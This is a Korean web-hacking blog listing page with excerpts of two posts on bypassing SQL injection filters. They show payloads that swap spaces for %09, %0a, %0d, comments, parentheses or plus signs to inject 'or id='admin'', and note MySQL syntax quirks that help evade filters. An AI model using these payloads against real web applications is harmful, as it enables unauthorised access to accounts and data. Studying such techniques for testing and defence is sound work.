Legacy/Web Hacking
-
SQL Injection 공격시 공백 문자 필터링 우회 문자들Legacy/Web Hacking 2015. 7. 22. 02:17
출처 - http://binaryu.tistory.com/31 SQL Injection 공격시 공백 문자 필터링시 우회 방법 1. Tab : %09 - no=1%09or%09id='admin' 2. Line Feed (\n): %0a - no=1%0aor%0aid='admin' 3. Carrage Return(\r) : %0d - no=1%0dor%0did='admin' 4. 주석 : /**/ - no=1/**/or/**/id='admin' 5. 괄호 : () - no=(1)or(id='admin') 6. 더하기 : + - no=1+or+id='admin'
-
SQL Injection 필터 우회Legacy/Web Hacking 2014. 12. 3. 14:40
출처 : http://luxs1t.tistory.com/28 http://luxs1t.tistory.com/65 우선 두서없이 필터링 우회 부분만 집중적으로 다뤄 보겠다. 우선 필터링에 대해선 크게 3가지로 나뉜다 1) MySQL syntax - MySQL은 상당히 말랑말랑한 문법체계를 가지고 있다. 무슨말인고 하니 SeLeCT와 같이 Keyword는 대소문자를 구분하지않고 select * from users와 같은 query도 공백을 필터링하는경우 %0a같은 delimiter를 쓸수 있고 또한 select(*)from(users); 와같이 공백이 필요한 부분에 ()를 감싸는것도 적법한 문장이다. 이러한 MySQL의 특성을 이용해 여러가지 필터링을 우회 할 수 있습니다. 2) Keyword Filter ..